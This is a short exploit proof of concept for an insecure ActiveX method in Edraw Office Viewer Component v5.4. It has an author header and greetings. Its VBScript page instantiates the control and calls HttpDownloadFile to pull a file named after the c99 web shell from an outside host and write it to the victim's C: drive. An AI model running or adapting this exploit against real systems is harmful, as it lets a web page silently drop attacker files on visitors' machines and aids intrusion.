EDraw Office Viewer Component version 5.4 HttpDownloadFile() insecure method exploit.
Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method
Founded By : Cyber-Zone
E-mail : Paradis_des_fous@hotmail.fr
Home : WwW.Exploiter5.CoM
GreetZ : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009
<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
End Sub